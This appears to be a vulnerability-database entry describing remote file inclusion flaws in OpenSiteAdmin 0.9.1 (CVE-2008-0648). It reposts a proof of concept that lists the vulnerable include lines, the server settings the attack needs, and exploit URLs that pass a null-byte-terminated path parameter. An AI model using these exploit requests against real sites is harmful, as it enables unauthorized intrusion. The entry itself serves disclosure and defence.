OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities

基本字段

漏洞编号：: SSV-65178

披露/发现时间：: 2008-02-07

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2008-0648

CNNVD-ID：: CNNVD-200802-115

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.15KB

Software Vulnerable: OpenSiteAdmin 0.9.1 BETA and maybe prior versions. Vulnerable Code: -OpenSiteAdmin/indexFooter.php require_once($path."footer.php"); -OpenSiteAdmin/scripts/classes/DatabaseManager.php require_once($path."OpenSiteAdmin/include.php"); require_once($path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php"); -OpenSiteAdmin/scripts/classes/FieldManager.php require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php"); require_once($path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php"); ..... .. -OpenSiteAdmin/scripts/classes/Filter.php require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php"); -OpenSiteAdmin/scripts/classes/Form.php require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php"); require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php"); -OpenSiteAdmin/scripts/classes/FormManager.php require_once($path."OpenSiteAdmin/scripts/classes/Form.php"); -OpenSiteAdmin/scripts/classes/LoginManager.php require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php"); -OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php"); Download: http://sourceforge.net/project/showfiles.php?group_id=213524 Server should have: Register Globals: On Magic_quotes_gpc: Off Exploit: http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=<File Inclusion>%00 Greetz: Members of http://www.p1mp4m.es and http://www.yashira.org Author: Trancek # milw0rm.com [2008-02-06]

共 3 兑换

参考链接

http://www.exploit-db.com/exploits/5068

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

2008-02-07 发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定